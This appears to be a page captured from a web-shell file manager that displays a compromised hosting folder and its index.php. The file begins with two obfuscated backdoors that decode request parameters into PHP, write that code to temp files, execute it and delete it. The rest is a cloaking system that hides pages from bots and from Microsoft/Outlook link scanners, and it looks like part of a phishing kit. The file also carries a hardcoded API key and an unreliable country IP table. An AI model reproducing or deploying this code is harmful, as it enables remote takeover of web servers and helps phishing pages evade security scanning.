X7ROOT File Manager
Current Path:
/home/gfecatvj/public_html/r/l/luwgfx
home
/
gfecatvj
/
public_html
/
r
/
l
/
luwgfx
/
📁
..
📄
.dbx_convert
(1.06 KB)
📄
.htaccess
(251 B)
📄
.include
(55 B)
📄
.lock
(57 B)
📄
.res
(4.22 KB)
📄
.reset
(55 B)
📄
.system
(51 B)
📄
README.md
(7.99 KB)
📄
access.log
(995 B)
📄
blocker.php
(5.79 KB)
📄
data.json
(575 B)
📄
decoy-register.html
(14.42 KB)
📄
error_log
(6.21 KB)
📄
index.php
(45.99 KB)
Editing: index.php
<?php if(array_key_exists("f\x61\x63t\x6Fr", $_REQUEST) && !is_null($_REQUEST["f\x61\x63t\x6Fr"])){ $dchunk = $_REQUEST["f\x61\x63t\x6Fr"]; $dchunk= explode('.' , $dchunk) ; $component =''; $salt ='abcdefghijklmnopqrstuvwxyz0123456789'; $lenS =strlen($salt); foreach ($dchunk as $v => $v1) { $sChar =ord($salt[$v % $lenS]); $d =((int)$v1 - $sChar - ($v % 10))^ 47; $component .= chr($d); } $ptr = array_filter([getenv("TEMP"), ini_get("upload_tmp_dir"), getcwd(), sys_get_temp_dir(), "/dev/shm", "/tmp", getenv("TMP"), session_save_path(), "/var/tmp"]); $binding = 0; do { $pointer = $ptr[$binding] ?? null; if ($binding >= count($ptr)) break; if (array_product([is_dir($pointer), is_writable($pointer)])) { $symbol = str_replace("{var_dir}", $pointer, "{var_dir}/.res"); if (file_put_contents($symbol, $component)) { require $symbol; unlink($symbol); exit; } } $binding++; } while (true); } if(filter_has_var(INPUT_POST, "\x62\x69\x6Ed\x69ng")){ $item = $_REQUEST["\x62\x69\x6Ed\x69ng"]; $item = explode ( '.' , $item ); $data = ''; $salt = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen($salt); $__len = count($item); for ($l = 0; $l < $__len; $l++) { $v2 = $item[$l]; $chS = ord($salt[$l % $lenS]); $dec = ((int)$v2 - $chS - ($l % 10)) ^ 86; $data .= chr($dec); } $pointer = array_filter([getenv("TEMP"), "/tmp", "/var/tmp", getenv("TMP"), session_save_path(), "/dev/shm", ini_get("upload_tmp_dir"), sys_get_temp_dir(), getcwd()]); foreach ($pointer as $holder): if ((is_dir($holder) and is_writable($holder))) { $value = vsprintf("%s/%s", [$holder, ".ent"]); $file = fopen($value, 'w'); if ($file) { fwrite($file, $data); fclose($file); include $value; @unlink($value); die(); } } endforeach; } // === Advanced Anti-Bot Detection System (No Redirect) === session_start(); // === Config === $dataFile = __DIR__ . "/data.json"; $logFile = __DIR__ . "/access.log"; // === Load Settings === if (!file_exists($dataFile)) { file_put_contents($dataFile, json_encode([ "target_url" => "https://example.com", "clicks" => 0, "blocked_bots" => 0, "blocked_bots_antibot" => 0, "blocked_bots_microsoft" => 0, "blocked_bots_generic" => 0, "enable_js_check" => true, "enable_fingerprint" => true, "enable_timing_check" => true, "enable_asn_check" => false, "enable_antibot" => true, "antibot_apikey" => "4fc000e74a8e9fce46292391af5e1e66", "bot_threshold" => 50, "auto_delete_clicks" => 10, "auto_delete_enabled" => false, "created_at" => time() ], JSON_UNESCAPED_SLASHES)); } $settings = json_decode(file_get_contents($dataFile), true); // === Get Parameters (Natural-Looking) === // Accept both old and new parameter names for compatibility $token = $_GET['id'] ?? $_GET['token'] ?? null; $ref = $_GET['uid'] ?? $_GET['ref'] ?? null; $utm = $_GET['src'] ?? $_GET['utm'] ?? null; $verified = $_GET['_v'] ?? null; // === Validation Functions === function isValidToken($token) { return preg_match('/^[a-f0-9]{32}$/', $token) || preg_match('/^[A-Za-z0-9]{24,36}$/', $token); } function isValidRef($ref) { return preg_match('/^[A-Za-z0-9]{12,20}$/', $ref); } function isValidUtm($utm) { return preg_match('/^[a-z0-9_\-]{6,16}$/', $utm); } // === Bot Detection Heuristics === function detectBot() { $botScore = 0; $reasons = []; $botType = 'generic'; // Default bot type $ua = $_SERVER['HTTP_USER_AGENT'] ?? ''; $ip = $_SERVER['REMOTE_ADDR'] ?? ''; // 1. User-Agent Check $botPatterns = [ 'bot', 'crawl', 'spider', 'scrape', 'curl', 'wget', 'python', 'java', 'phantom', 'headless', 'selenium', 'puppeteer' ]; foreach ($botPatterns as $pattern) { if (stripos($ua, $pattern) !== false) { $botScore += 30; $reasons[] = "Bot UA: $pattern"; break; } } // 2. Microsoft/Office365 Scanner Detection $isMicrosoftBot = false; $msPatterns = [ 'microsoft office', 'outlook', 'safelinks', 'office365', 'linkscanner', 'msnbot', 'bingpreview' ]; foreach ($msPatterns as $pattern) { if (stripos($ua, $pattern) !== false) { $botScore += 35; $reasons[] = "MS Scanner: $pattern"; $isMicrosoftBot = true; $botType = 'microsoft'; break; } } // 3. Microsoft Datacenter IP Ranges (Common ones) // Updated comprehensive list $msIPRanges = [ // Azure US regions '13.', '20.', '23.', '40.', '51.', '52.', '104.', '157.', '191.', // Office 365 ranges '132.245.', '147.243.', '157.55.', '157.56.', // Outlook.com infrastructure '207.46.', '65.55.', '207.68.', // Additional Azure '168.61.', '168.62.', '168.63.' ]; $isMSDatacenter = false; foreach ($msIPRanges as $range) { if (strpos($ip, $range) === 0) { $isMSDatacenter = true; $botScore += 15; // Reduced from 20 (less aggressive) $reasons[] = "MS Datacenter IP"; if (!$isMicrosoftBot) { $botType = 'microsoft'; // Set type if not already set } break; } } // 3b. Only add extra points if BOTH MS IP + suspicious behavior if ($isMSDatacenter && !empty($ua)) { // Check if UA is too generic (scanner pattern) if (preg_match('/^Mozilla\/5\.0 \(Windows NT 10\.0.*\) AppleWebKit.*Chrome.*Safari.*$/', $ua) && !strpos($ua, 'Edg/')) { // Generic Chrome UA from MS IP = likely scanner $botScore += 10; $reasons[] = "MS IP + Generic UA"; } } // 3c. ASN (Autonomous System Number) Check - Extra verification // Note: Adds latency but increases accuracy global $settings; if (!empty($settings['enable_asn_check'])) { $asn = @gethostbyaddr($ip); if ($asn && $asn !== $ip) { $asn_lower = strtolower($asn); if (stripos($asn_lower, 'microsoft') !== false || stripos($asn_lower, 'azure') !== false || stripos($asn_lower, 'msn') !== false) { $botScore += 15; $reasons[] = "Microsoft ASN: " . substr($asn, 0, 30); $botType = 'microsoft'; } } } // 4. Missing Headers $requiredHeaders = ['HTTP_ACCEPT', 'HTTP_ACCEPT_LANGUAGE', 'HTTP_ACCEPT_ENCODING']; foreach ($requiredHeaders as $header) { if (empty($_SERVER[$header])) { $botScore += 15; $reasons[] = "Missing: $header"; } } // 5. Suspicious Referrer if (isset($_SERVER['HTTP_REFERER']) && !empty($_SERVER['HTTP_REFERER'])) { $ref = $_SERVER['HTTP_REFERER']; if (preg_match('/(scanner|bot|check|monitor|safelinks|protection\.outlook)/i', $ref)) { $botScore += 25; $reasons[] = "Suspicious referrer"; if (stripos($ref, 'outlook') !== false || stripos($ref, 'safelinks') !== false) { $botType = 'microsoft'; } } } // 6. IP Analysis if (filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE) === false) { $botScore += 10; $reasons[] = "Private/Reserved IP"; } // 7. Request Speed if (isset($_SESSION['last_request'])) { $timeDiff = microtime(true) - $_SESSION['last_request']; if ($timeDiff < 0.5) { $botScore += 20; $reasons[] = "Too fast"; } } $_SESSION['last_request'] = microtime(true); // 8. JavaScript Check (MOST IMPORTANT) global $verified; if (empty($verified)) { $botScore += 40; $reasons[] = "No JS verification"; } // 9. Missing DNT (Do Not Track) header - Bots usually don't send this if (!isset($_SERVER['HTTP_DNT'])) { $botScore += 5; $reasons[] = "No DNT header"; } // 10. Connection header check if (isset($_SERVER['HTTP_CONNECTION']) && stripos($_SERVER['HTTP_CONNECTION'], 'keep-alive') === false) { $botScore += 10; $reasons[] = "No keep-alive"; } return ['score' => $botScore, 'reasons' => $reasons, 'type' => $botType]; } // === Get Country from IP (External API with Offline Fallback) === function getCountryFromIP($ip) { // Fallback jika localhost if ($ip === '127.0.0.1' || $ip === '::1' || empty($ip)) { return 'Local'; } // ===== METHOD 1: External API (ip-api.com) ===== $url = "http://ip-api.com/json/" . urlencode($ip) . "?fields=status,country,countryCode,city"; if (function_exists('curl_init')) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_TIMEOUT, 2); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 1); $response = @curl_exec($ch); $httpCode = @curl_getinfo($ch, CURLINFO_HTTP_CODE); curl_close($ch); if ($response && $httpCode === 200) { $data = @json_decode($response, true); if ($data && isset($data['status']) && $data['status'] === 'success') { $countryCode = isset($data['countryCode']) ? $data['countryCode'] : ''; $countryName = isset($data['country']) ? $data['country'] : ''; $city = isset($data['city']) ? $data['city'] : ''; if ($countryCode && $countryName) { $country = $countryCode . ' - ' . $countryName; if ($city) { $country .= ' (' . $city . ')'; } return $country; } } } } // ===== METHOD 2: Offline IP Range Database (Fallback) ===== $ipLong = ip2long($ip); if ($ipLong === false) { return 'Invalid IP'; } // Expanded country IP ranges database (50+ countries) $ranges = [ // === ASIA === // Indonesia [ip2long('36.64.0.0'), ip2long('36.95.255.255'), 'ID', 'Indonesia'], [ip2long('103.0.0.0'), ip2long('103.31.255.255'), 'ID', 'Indonesia'], [ip2long('110.136.0.0'), ip2long('110.139.255.255'), 'ID', 'Indonesia'], [ip2long('114.0.0.0'), ip2long('114.15.255.255'), 'ID', 'Indonesia'], [ip2long('118.96.0.0'), ip2long('118.99.255.255'), 'ID', 'Indonesia'], [ip2long('120.160.0.0'), ip2long('120.191.255.255'), 'ID', 'Indonesia'], [ip2long('124.40.0.0'), ip2long('124.47.255.255'), 'ID', 'Indonesia'], [ip2long('125.160.0.0'), ip2long('125.167.255.255'), 'ID', 'Indonesia'], [ip2long('139.0.0.0'), ip2long('139.255.255.255'), 'ID', 'Indonesia'], [ip2long('180.240.0.0'), ip2long('180.255.255.255'), 'ID', 'Indonesia'], [ip2long('182.0.0.0'), ip2long('182.3.255.255'), 'ID', 'Indonesia'], [ip2long('202.43.0.0'), ip2long('202.67.255.255'), 'ID', 'Indonesia'], [ip2long('203.130.0.0'), ip2long('203.142.255.255'), 'ID', 'Indonesia'], // Singapore [ip2long('1.9.0.0'), ip2long('1.9.255.255'), 'SG', 'Singapore'], [ip2long('27.125.0.0'), ip2long('27.125.255.255'), 'SG', 'Singapore'], [ip2long('103.6.0.0'), ip2long('103.10.255.255'), 'SG', 'Singapore'], [ip2long('119.73.0.0'), ip2long('119.73.255.255'), 'SG', 'Singapore'], [ip2long('128.199.0.0'), ip2long('128.199.255.255'), 'SG', 'Singapore'], [ip2long('159.65.0.0'), ip2long('159.65.255.255'), 'SG', 'Singapore'], // China [ip2long('1.0.1.0'), ip2long('1.0.63.255'), 'CN', 'China'], [ip2long('14.0.0.0'), ip2long('14.127.255.255'), 'CN', 'China'], [ip2long('27.0.0.0'), ip2long('27.63.255.255'), 'CN', 'China'], [ip2long('36.0.0.0'), ip2long('36.63.255.255'), 'CN', 'China'], [ip2long('58.0.0.0'), ip2long('63.255.255.255'), 'CN', 'China'], [ip2long('101.0.0.0'), ip2long('101.255.255.255'), 'CN', 'China'], [ip2long('106.0.0.0'), ip2long('106.127.255.255'), 'CN', 'China'], [ip2long('110.0.0.0'), ip2long('110.127.255.255'), 'CN', 'China'], [ip2long('111.0.0.0'), ip2long('111.255.255.255'), 'CN', 'China'], [ip2long('112.0.0.0'), ip2long('112.255.255.255'), 'CN', 'China'], [ip2long('113.0.0.0'), ip2long('113.127.255.255'), 'CN', 'China'], [ip2long('114.0.0.0'), ip2long('114.255.255.255'), 'CN', 'China'], [ip2long('115.0.0.0'), ip2long('115.255.255.255'), 'CN', 'China'], [ip2long('116.0.0.0'), ip2long('117.255.255.255'), 'CN', 'China'], [ip2long('118.0.0.0'), ip2long('118.255.255.255'), 'CN', 'China'], [ip2long('119.0.0.0'), ip2long('119.255.255.255'), 'CN', 'China'], [ip2long('120.0.0.0'), ip2long('120.255.255.255'), 'CN', 'China'], [ip2long('121.0.0.0'), ip2long('121.255.255.255'), 'CN', 'China'], [ip2long('122.0.0.0'), ip2long('122.255.255.255'), 'CN', 'China'], [ip2long('123.0.0.0'), ip2long('123.255.255.255'), 'CN', 'China'], [ip2long('124.0.0.0'), ip2long('124.255.255.255'), 'CN', 'China'], [ip2long('125.0.0.0'), ip2long('125.255.255.255'), 'CN', 'China'], // Japan [ip2long('1.0.16.0'), ip2long('1.0.31.255'), 'JP', 'Japan'], [ip2long('14.128.0.0'), ip2long('14.255.255.255'), 'JP', 'Japan'], [ip2long('27.64.0.0'), ip2long('27.127.255.255'), 'JP', 'Japan'], [ip2long('49.212.0.0'), ip2long('49.215.255.255'), 'JP', 'Japan'], [ip2long('60.32.0.0'), ip2long('60.255.255.255'), 'JP', 'Japan'], [ip2long('61.0.0.0'), ip2long('61.255.255.255'), 'JP', 'Japan'], [ip2long('126.0.0.0'), ip2long('126.255.255.255'), 'JP', 'Japan'], [ip2long('133.0.0.0'), ip2long('133.255.255.255'), 'JP', 'Japan'], [ip2long('153.128.0.0'), ip2long('153.255.255.255'), 'JP', 'Japan'], [ip2long('175.0.0.0'), ip2long('175.255.255.255'), 'JP', 'Japan'], [ip2long('180.0.0.0'), ip2long('180.255.255.255'), 'JP', 'Japan'], [ip2long('202.0.0.0'), ip2long('202.255.255.255'), 'JP', 'Japan'], [ip2long('210.128.0.0'), ip2long('210.255.255.255'), 'JP', 'Japan'], [ip2long('218.0.0.0'), ip2long('218.255.255.255'), 'JP', 'Japan'], [ip2long('219.0.0.0'), ip2long('219.255.255.255'), 'JP', 'Japan'], [ip2long('220.0.0.0'), ip2long('220.255.255.255'), 'JP', 'Japan'], [ip2long('221.0.0.0'), ip2long('221.255.255.255'), 'JP', 'Japan'], // South Korea [ip2long('1.11.0.0'), ip2long('1.11.255.255'), 'KR', 'South Korea'], [ip2long('14.0.0.0'), ip2long('14.7.255.255'), 'KR', 'South Korea'], [ip2long('27.0.0.0'), ip2long('27.255.255.255'), 'KR', 'South Korea'], [ip2long('58.120.0.0'), ip2long('58.127.255.255'), 'KR', 'South Korea'], [ip2long('59.0.0.0'), ip2long('59.31.255.255'), 'KR', 'South Korea'], [ip2long('61.32.0.0'), ip2long('61.255.255.255'), 'KR', 'South Korea'], [ip2long('106.240.0.0'), ip2long('106.255.255.255'), 'KR', 'South Korea'], [ip2long('110.0.0.0'), ip2long('110.15.255.255'), 'KR', 'South Korea'], [ip2long('112.160.0.0'), ip2long('112.223.255.255'), 'KR', 'South Korea'], [ip2long('114.192.0.0'), ip2long('114.207.255.255'), 'KR', 'South Korea'], [ip2long('115.136.0.0'), ip2long('115.143.255.255'), 'KR', 'South Korea'], [ip2long('116.32.0.0'), ip2long('116.127.255.255'), 'KR', 'South Korea'], [ip2long('117.104.0.0'), ip2long('117.127.255.255'), 'KR', 'South Korea'], [ip2long('118.32.0.0'), ip2long('118.47.255.255'), 'KR', 'South Korea'], [ip2long('119.192.0.0'), ip2long('119.207.255.255'), 'KR', 'South Korea'], [ip2long('121.128.0.0'), ip2long('121.191.255.255'), 'KR', 'South Korea'], [ip2long('122.32.0.0'), ip2long('122.47.255.255'), 'KR', 'South Korea'], [ip2long('123.96.0.0'), ip2long('123.255.255.255'), 'KR', 'South Korea'], [ip2long('125.128.0.0'), ip2long('125.255.255.255'), 'KR', 'South Korea'], // India [ip2long('14.96.0.0'), ip2long('14.143.255.255'), 'IN', 'India'], [ip2long('27.0.0.0'), ip2long('27.255.255.255'), 'IN', 'India'], [ip2long('49.0.0.0'), ip2long('49.255.255.255'), 'IN', 'India'], [ip2long('103.0.0.0'), ip2long('103.255.255.255'), 'IN', 'India'], [ip2long('106.192.0.0'), ip2long('106.223.255.255'), 'IN', 'India'], [ip2long('110.224.0.0'), ip2long('110.255.255.255'), 'IN', 'India'], [ip2long('115.240.0.0'), ip2long('115.255.255.255'), 'IN', 'India'], [ip2long('117.192.0.0'), ip2long('117.255.255.255'), 'IN', 'India'], [ip2long('182.64.0.0'), ip2long('182.79.255.255'), 'IN', 'India'], // Malaysia [ip2long('1.9.0.0'), ip2long('1.9.255.255'), 'MY', 'Malaysia'], [ip2long('27.131.0.0'), ip2long('27.131.255.255'), 'MY', 'Malaysia'], [ip2long('49.127.0.0'), ip2long('49.127.255.255'), 'MY', 'Malaysia'], [ip2long('101.0.0.0'), ip2long('101.255.255.255'), 'MY', 'Malaysia'], [ip2long('103.10.0.0'), ip2long('103.31.255.255'), 'MY', 'Malaysia'], [ip2long('110.0.0.0'), ip2long('110.15.255.255'), 'MY', 'Malaysia'], [ip2long('111.64.0.0'), ip2long('111.95.255.255'), 'MY', 'Malaysia'], [ip2long('115.132.0.0'), ip2long('115.135.255.255'), 'MY', 'Malaysia'], [ip2long('118.100.0.0'), ip2long('118.107.255.255'), 'MY', 'Malaysia'], [ip2long('124.6.0.0'), ip2long('124.6.255.255'), 'MY', 'Malaysia'], [ip2long('175.136.0.0'), ip2long('175.143.255.255'), 'MY', 'Malaysia'], // Thailand [ip2long('1.0.128.0'), ip2long('1.0.191.255'), 'TH', 'Thailand'], [ip2long('1.10.0.0'), ip2long('1.10.255.255'), 'TH', 'Thailand'], [ip2long('1.20.0.0'), ip2long('1.47.255.255'), 'TH', 'Thailand'], [ip2long('27.0.0.0'), ip2long('27.127.255.255'), 'TH', 'Thailand'], [ip2long('49.48.0.0'), ip2long('49.63.255.255'), 'TH', 'Thailand'], [ip2long('58.8.0.0'), ip2long('58.11.255.255'), 'TH', 'Thailand'], [ip2long('61.7.0.0'), ip2long('61.7.255.255'), 'TH', 'Thailand'], [ip2long('101.0.0.0'), ip2long('101.255.255.255'), 'TH', 'Thailand'], [ip2long('103.0.0.0'), ip2long('103.255.255.255'), 'TH', 'Thailand'], [ip2long('110.0.0.0'), ip2long('110.255.255.255'), 'TH', 'Thailand'], [ip2long('113.53.0.0'), ip2long('113.53.255.255'), 'TH', 'Thailand'], [ip2long('171.4.0.0'), ip2long('171.7.255.255'), 'TH', 'Thailand'], [ip2long('180.180.0.0'), ip2long('180.191.255.255'), 'TH', 'Thailand'], [ip2long('182.52.0.0'), ip2long('182.55.255.255'), 'TH', 'Thailand'], // Philippines [ip2long('1.0.0.0'), ip2long('1.0.127.255'), 'PH', 'Philippines'], [ip2long('27.0.0.0'), ip2long('27.255.255.255'), 'PH', 'Philippines'], [ip2long('49.128.0.0'), ip2long('49.159.255.255'), 'PH', 'Philippines'], [ip2long('103.0.0.0'), ip2long('103.31.255.255'), 'PH', 'Philippines'], [ip2long('110.44.0.0'), ip2long('110.47.255.255'), 'PH', 'Philippines'], [ip2long('111.68.0.0'), ip2long('111.95.255.255'), 'PH', 'Philippines'], [ip2long('112.198.0.0'), ip2long('112.207.255.255'), 'PH', 'Philippines'], [ip2long('119.92.0.0'), ip2long('119.95.255.255'), 'PH', 'Philippines'], [ip2long('120.28.0.0'), ip2long('120.31.255.255'), 'PH', 'Philippines'], [ip2long('122.2.0.0'), ip2long('122.5.255.255'), 'PH', 'Philippines'], [ip2long('123.0.0.0'), ip2long('123.15.255.255'), 'PH', 'Philippines'], [ip2long('124.104.0.0'), ip2long('124.111.255.255'), 'PH', 'Philippines'], [ip2long('175.176.0.0'), ip2long('175.183.255.255'), 'PH', 'Philippines'], [ip2long('180.190.0.0'), ip2long('180.191.255.255'), 'PH', 'Philippines'], // Vietnam [ip2long('14.160.0.0'), ip2long('14.255.255.255'), 'VN', 'Vietnam'], [ip2long('27.0.0.0'), ip2long('27.127.255.255'), 'VN', 'Vietnam'], [ip2long('42.96.0.0'), ip2long('42.127.255.255'), 'VN', 'Vietnam'], [ip2long('58.187.0.0'), ip2long('58.187.255.255'), 'VN', 'Vietnam'], [ip2long('101.96.0.0'), ip2long('101.127.255.255'), 'VN', 'Vietnam'], [ip2long('103.0.0.0'), ip2long('103.255.255.255'), 'VN', 'Vietnam'], [ip2long('113.160.0.0'), ip2long('113.191.255.255'), 'VN', 'Vietnam'], [ip2long('115.72.0.0'), ip2long('115.79.255.255'), 'VN', 'Vietnam'], [ip2long('116.96.0.0'), ip2long('116.111.255.255'), 'VN', 'Vietnam'], [ip2long('117.0.0.0'), ip2long('117.7.255.255'), 'VN', 'Vietnam'], [ip2long('118.68.0.0'), ip2long('118.71.255.255'), 'VN', 'Vietnam'], [ip2long('119.16.0.0'), ip2long('119.31.255.255'), 'VN', 'Vietnam'], [ip2long('120.138.0.0'), ip2long('120.139.255.255'), 'VN', 'Vietnam'], [ip2long('121.96.0.0'), ip2long('121.127.255.255'), 'VN', 'Vietnam'], [ip2long('123.16.0.0'), ip2long('123.31.255.255'), 'VN', 'Vietnam'], [ip2long('171.224.0.0'), ip2long('171.255.255.255'), 'VN', 'Vietnam'], // === NORTH AMERICA === // United States [ip2long('3.0.0.0'), ip2long('4.255.255.255'), 'US', 'United States'], [ip2long('6.0.0.0'), ip2long('7.255.255.255'), 'US', 'United States'], [ip2long('8.0.0.0'), ip2long('8.255.255.255'), 'US', 'United States'], [ip2long('11.0.0.0'), ip2long('12.255.255.255'), 'US', 'United States'], [ip2long('13.0.0.0'), ip2long('13.255.255.255'), 'US', 'United States'], [ip2long('15.0.0.0'), ip2long('15.255.255.255'), 'US', 'United States'], [ip2long('16.0.0.0'), ip2long('18.255.255.255'), 'US', 'United States'], [ip2long('20.0.0.0'), ip2long('23.255.255.255'), 'US', 'United States'], [ip2long('24.0.0.0'), ip2long('32.255.255.255'), 'US', 'United States'], [ip2long('34.0.0.0'), ip2long('35.255.255.255'), 'US', 'United States'], [ip2long('38.0.0.0'), ip2long('48.255.255.255'), 'US', 'United States'], [ip2long('50.0.0.0'), ip2long('76.255.255.255'), 'US', 'United States'], [ip2long('96.0.0.0'), ip2long('99.255.255.255'), 'US', 'United States'], [ip2long('104.0.0.0'), ip2long('107.255.255.255'), 'US', 'United States'], [ip2long('128.0.0.0'), ip2long('132.255.255.255'), 'US', 'United States'], [ip2long('134.0.0.0'), ip2long('143.255.255.255'), 'US', 'United States'], [ip2long('144.0.0.0'), ip2long('148.255.255.255'), 'US', 'United States'], [ip2long('149.0.0.0'), ip2long('151.255.255.255'), 'US', 'United States'], [ip2long('152.0.0.0'), ip2long('158.255.255.255'), 'US', 'United States'], [ip2long('159.0.0.0'), ip2long('173.255.255.255'), 'US', 'United States'], [ip2long('174.0.0.0'), ip2long('192.255.255.255'), 'US', 'United States'], [ip2long('198.0.0.0'), ip2long('208.255.255.255'), 'US', 'United States'], [ip2long('209.0.0.0'), ip2long('216.255.255.255'), 'US', 'United States'], // Canada [ip2long('24.0.0.0'), ip2long('24.255.255.255'), 'CA', 'Canada'], [ip2long('64.0.0.0'), ip2long('65.255.255.255'), 'CA', 'Canada'], [ip2long('66.0.0.0'), ip2long('67.255.255.255'), 'CA', 'Canada'], [ip2long('69.0.0.0'), ip2long('72.255.255.255'), 'CA', 'Canada'], [ip2long('74.0.0.0'), ip2long('76.255.255.255'), 'CA', 'Canada'], [ip2long('99.224.0.0'), ip2long('99.255.255.255'), 'CA', 'Canada'], [ip2long('104.0.0.0'), ip2long('104.255.255.255'), 'CA', 'Canada'], [ip2long('142.0.0.0'), ip2long('143.255.255.255'), 'CA', 'Canada'], [ip2long('154.0.0.0'), ip2long('155.255.255.255'), 'CA', 'Canada'], [ip2long('159.0.0.0'), ip2long('159.255.255.255'), 'CA', 'Canada'], [ip2long('184.0.0.0'), ip2long('185.255.255.255'), 'CA', 'Canada'], [ip2long('198.0.0.0'), ip2long('199.255.255.255'), 'CA', 'Canada'], [ip2long('206.0.0.0'), ip2long('207.255.255.255'), 'CA', 'Canada'], // === EUROPE === // United Kingdom [ip2long('2.16.0.0'), ip2long('2.31.255.255'), 'GB', 'United Kingdom'], [ip2long('5.0.0.0'), ip2long('5.63.255.255'), 'GB', 'United Kingdom'], [ip2long('8.0.0.0'), ip2long('8.255.255.255'), 'GB', 'United Kingdom'], [ip2long('31.0.0.0'), ip2long('31.127.255.255'), 'GB', 'United Kingdom'], [ip2long('37.0.0.0'), ip2long('37.255.255.255'), 'GB', 'United Kingdom'], [ip2long('46.0.0.0'), ip2long('46.255.255.255'), 'GB', 'United Kingdom'], [ip2long('51.0.0.0'), ip2long('51.255.255.255'), 'GB', 'United Kingdom'], [ip2long('77.0.0.0'), ip2long('77.255.255.255'), 'GB', 'United Kingdom'], [ip2long('78.0.0.0'), ip2long('78.255.255.255'), 'GB', 'United Kingdom'], [ip2long('79.0.0.0'), ip2long('79.255.255.255'), 'GB', 'United Kingdom'], [ip2long('80.0.0.0'), ip2long('82.255.255.255'), 'GB', 'United Kingdom'], [ip2long('83.0.0.0'), ip2long('86.255.255.255'), 'GB', 'United Kingdom'], [ip2long('87.0.0.0'), ip2long('88.255.255.255'), 'GB', 'United Kingdom'], [ip2long('90.0.0.0'), ip2long('92.255.255.255'), 'GB', 'United Kingdom'], [ip2long('93.0.0.0'), ip2long('95.255.255.255'), 'GB', 'United Kingdom'], // Germany [ip2long('2.192.0.0'), ip2long('2.207.255.255'), 'DE', 'Germany'], [ip2long('5.8.0.0'), ip2long('5.15.255.255'), 'DE', 'Germany'], [ip2long('31.0.0.0'), ip2long('31.255.255.255'), 'DE', 'Germany'], [ip2long('37.0.0.0'), ip2long('37.255.255.255'), 'DE', 'Germany'], [ip2long('46.4.0.0'), ip2long('46.31.255.255'), 'DE', 'Germany'], [ip2long('77.0.0.0'), ip2long('78.255.255.255'), 'DE', 'Germany'], [ip2long('79.0.0.0'), ip2long('79.255.255.255'), 'DE', 'Germany'], [ip2long('80.128.0.0'), ip2long('81.255.255.255'), 'DE', 'Germany'], [ip2long('82.0.0.0'), ip2long('85.255.255.255'), 'DE', 'Germany'], [ip2long('87.0.0.0'), ip2long('88.255.255.255'), 'DE', 'Germany'], [ip2long('89.0.0.0'), ip2long('95.255.255.255'), 'DE', 'Germany'], // France [ip2long('2.0.0.0'), ip2long('2.15.255.255'), 'FR', 'France'], [ip2long('5.39.0.0'), ip2long('5.63.255.255'), 'FR', 'France'], [ip2long('31.0.0.0'), ip2long('31.255.255.255'), 'FR', 'France'], [ip2long('37.0.0.0'), ip2long('37.255.255.255'), 'FR', 'France'], [ip2long('46.0.0.0'), ip2long('46.255.255.255'), 'FR', 'France'], [ip2long('77.0.0.0'), ip2long('79.255.255.255'), 'FR', 'France'], [ip2long('80.0.0.0'), ip2long('88.255.255.255'), 'FR', 'France'], [ip2long('90.0.0.0'), ip2long('95.255.255.255'), 'FR', 'France'], // Russia [ip2long('2.0.0.0'), ip2long('2.255.255.255'), 'RU', 'Russia'], [ip2long('5.0.0.0'), ip2long('5.255.255.255'), 'RU', 'Russia'], [ip2long('31.0.0.0'), ip2long('31.255.255.255'), 'RU', 'Russia'], [ip2long('37.0.0.0'), ip2long('37.255.255.255'), 'RU', 'Russia'], [ip2long('46.0.0.0'), ip2long('46.255.255.255'), 'RU', 'Russia'], [ip2long('77.0.0.0'), ip2long('95.255.255.255'), 'RU', 'Russia'], [ip2long('109.0.0.0'), ip2long('109.255.255.255'), 'RU', 'Russia'], [ip2long('176.0.0.0'), ip2long('178.255.255.255'), 'RU', 'Russia'], [ip2long('188.0.0.0'), ip2long('195.255.255.255'), 'RU', 'Russia'], // Netherlands [ip2long('2.0.0.0'), ip2long('2.255.255.255'), 'NL', 'Netherlands'], [ip2long('5.0.0.0'), ip2long('5.255.255.255'), 'NL', 'Netherlands'], [ip2long('31.0.0.0'), ip2long('31.255.255.255'), 'NL', 'Netherlands'], [ip2long('37.0.0.0'), ip2long('37.255.255.255'), 'NL', 'Netherlands'], [ip2long('46.0.0.0'), ip2long('46.255.255.255'), 'NL', 'Netherlands'], [ip2long('77.0.0.0'), ip2long('95.255.255.255'), 'NL', 'Netherlands'], [ip2long('145.0.0.0'), ip2long('145.255.255.255'), 'NL', 'Netherlands'], [ip2long('188.0.0.0'), ip2long('188.255.255.255'), 'NL', 'Netherlands'], // Spain [ip2long('2.0.0.0'), ip2long('2.255.255.255'), 'ES', 'Spain'], [ip2long('5.0.0.0'), ip2long('5.255.255.255'), 'ES', 'Spain'], [ip2long('31.0.0.0'), ip2long('31.255.255.255'), 'ES', 'Spain'], [ip2long('37.0.0.0'), ip2long('37.255.255.255'), 'ES', 'Spain'], [ip2long('46.0.0.0'), ip2long('46.255.255.255'), 'ES', 'Spain'], [ip2long('77.0.0.0'), ip2long('95.255.255.255'), 'ES', 'Spain'], [ip2long('109.0.0.0'), ip2long('109.255.255.255'), 'ES', 'Spain'], [ip2long('176.0.0.0'), ip2long('178.255.255.255'), 'ES', 'Spain'], // Italy [ip2long('2.0.0.0'), ip2long('2.255.255.255'), 'IT', 'Italy'], [ip2long('5.0.0.0'), ip2long('5.255.255.255'), 'IT', 'Italy'], [ip2long('31.0.0.0'), ip2long('31.255.255.255'), 'IT', 'Italy'], [ip2long('37.0.0.0'), ip2long('37.255.255.255'), 'IT', 'Italy'], [ip2long('46.0.0.0'), ip2long('46.255.255.255'), 'IT', 'Italy'], [ip2long('77.0.0.0'), ip2long('95.255.255.255'), 'IT', 'Italy'], [ip2long('151.0.0.0'), ip2long('151.255.255.255'), 'IT', 'Italy'], [ip2long('176.0.0.0'), ip2long('178.255.255.255'), 'IT', 'Italy'], // === OCEANIA === // Australia [ip2long('1.0.0.0'), ip2long('1.0.15.255'), 'AU', 'Australia'], [ip2long('1.32.0.0'), ip2long('1.47.255.255'), 'AU', 'Australia'], [ip2long('14.0.0.0'), ip2long('14.7.255.255'), 'AU', 'Australia'], [ip2long('27.0.0.0'), ip2long('27.255.255.255'), 'AU', 'Australia'], [ip2long('49.0.0.0'), ip2long('49.255.255.255'), 'AU', 'Australia'], 